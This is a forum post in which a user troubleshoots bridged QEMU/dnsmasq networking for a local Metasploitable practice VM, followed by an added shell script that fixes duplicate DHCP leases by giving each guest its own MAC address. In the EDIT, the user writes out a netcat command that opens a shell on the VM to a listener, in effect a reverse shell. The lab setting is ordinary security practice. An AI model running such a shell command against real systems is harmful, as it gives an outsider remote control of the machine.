#1 2019-09-19 21:36:14

ExecutionByFork
Member
Registered: 2019-03-14
Posts: 9

Having trouble connecting to a VM running under qemu

I've set up a VM and gotten it running using qemu-system-x86_64 (detailed steps on my setup are below). I was able to successfully boot the VM, and I can ping the VM from the host, and ping the host from the VM. However, I cannot establish a netcat tcp session with the VM in either direction. Both the VM and host machine have any:any iptable rules, and because they can ping, they should be able to route traffic to each other over TCP/UDP as well.
The error I get via netcat:

$ netcat -t 192.168.179.12:1337
Error: Couldn't resolve host "192.168.179.12:1337"

The above indicates something is probably messed up with the routing. I think the culprit may be DNS, and I say this because I have DHCP setup for the interface (bridge) the VM connects to. However, every time the VM boots it has the same IP address (192.168.179.12). Additionally, when running two copies of the VM (I have a .vmdk and .qcow2 image) both VMs have this same IP. This points to something not being set up properly with dnsmasq, though I need assistance in locating the exact problem so I can fix it, because I'm scratching my head and I admit networking isn't my strong suit.

My Setup
I've followed pretty closely along with the steps provided in this post here. I want the VM to only be able to communicate with the host, and not the internet.

The commands I ran to get to this point are as follows:

# Standing up the bridge interface
brctl addbr br0
ip addr add 192.168.179.1/24 broadcast 192.168.179.255 dev br0
ip link set br0 up

# Creating tap interfaces for the two individual VMs
ip tuntap add dev tap0 mode tap
ip link set tap0 up
ip tuntap add dev tap1 mode tap
ip link set tap1 up

# Linking the tap interfaces to the bridge
brctl addif br0 tap0
brctl addif br0 tap1

# Telling dnsmasq to dynamically assign IPs from a pool of 5 addresses
dnsmasq --interface=br0 --bind-interfaces --dhcp-range=192.168.179.10,192.168.179.15

# Running the VM
qemu-system-x86_64 -enable-kvm -m 1024 -netdev tap,id=t0,ifname=tap0,script=no,downscript=no -device e1000,netdev=t0,id=nic0 Metasploitable.qcow2 & disown

Checking netstat shows dnsmasq is running for the 192.168.179.X subnet

$ sudo netstat -lpun
Active Internet connections (only servers)
Proto Recv-Q Send-Q Local Address           Foreign Address         State       PID/Program name    
udp        0      0 127.0.0.1:53            0.0.0.0:*                           5110/dnsmasq        
udp        0      0 192.168.179.1:53        0.0.0.0:*                           5110/dnsmasq        
udp        0      0 0.0.0.0:67              0.0.0.0:*                           5110/dnsmasq        
udp        0      0 <my IPv4>:68            0.0.0.0:*                           203/NetworkManager  
udp6       0      0 ::1:53                  :::*                                5110/dnsmasq        
udp6       0      0 <my IPv6>:53            :::*                                5110/dnsmasq

EDIT:

$ nc -lvp 1337

and

nc <my IP> 1337 -e /bin/sh

opens a shell on the VM.

Lesson learned?
Always check your syntax, kids (I overlooked this when I saw a routing error and immediately dove into researching dnsmasq before getting lost in the rabbit hole).

Though, this doesn't explain why my two VMs both have the same IP when DHCP is set up for them on the bridge... I could use some suggestions on where to look there, but at least I can connect to the thing now and play around with it.

Last edited by ExecutionByFork (2019-09-19 21:49:15)
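
On the open question of both VMs getting 192.168.179.12: QEMU gives the first NIC of every guest the default MAC 52:54:00:12:34:56 unless mac= is set on the -device option, and dnsmasq keys its DHCP leases on the MAC. The script below is an added example, not part of the original post; it derives a stable per-image MAC and checks a set of -device strings for duplicates. The function names, the netdev id t1 and the file name Metasploitable.vmdk are assumptions made for illustration.

```shell
#!/bin/sh
# Added example (not from the original post). Function names are hypothetical.
# QEMU's default MAC for the first NIC of a guest when no mac= is given:
QEMU_DEFAULT_MAC=52:54:00:12:34:56

# vm_mac NAME: stable MAC under QEMU's 52:54:00 prefix; the low 24 bits
# come from a CRC of NAME, so the same image always gets the same MAC.
vm_mac() (
    crc=$(printf '%s' "$1" | cksum | cut -d' ' -f1)
    printf '%06x\n' $(( crc % 16777216 )) |
        sed 's/\(..\)\(..\)\(..\)/52:54:00:\1:\2:\3/'
)

# nic_mac DEVICE_OPTS: the MAC a "-device" option string results in,
# i.e. the explicit mac= value, or QEMU's default when none is set.
nic_mac() (
    mac=$(printf '%s\n' "$1" | tr ',' '\n' | sed -n 's/^mac=//p' | head -n 1)
    printf '%s\n' "${mac:-$QEMU_DEFAULT_MAC}" | tr 'A-F' 'a-f'
)

# dup_macs: read one MAC per line on stdin, print each one seen more than once.
dup_macs() {
    sort | uniq -d
}

# device_opts NETDEV_ID IMAGE: e1000 option string with a per-image MAC pinned.
device_opts() {
    printf 'e1000,netdev=%s,mac=%s\n' "$1" "$(vm_mac "$2")"
}

# Constructed input: the post's -device string, reused for a second guest (t1 assumed).
echo "duplicate MACs as posted:"
{ nic_mac 'e1000,netdev=t0,id=nic0'; nic_mac 'e1000,netdev=t1,id=nic0'; } | dup_macs

# Image names below are assumed; the post only names Metasploitable.qcow2.
echo "-device options with pinned MACs:"
device_opts t0 Metasploitable.qcow2
device_opts t1 Metasploitable.vmdk
```

The strings printed by device_opts go in place of `e1000,netdev=t0,id=nic0` in the qemu-system-x86_64 command, one per guest, each paired with its own tap interface.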
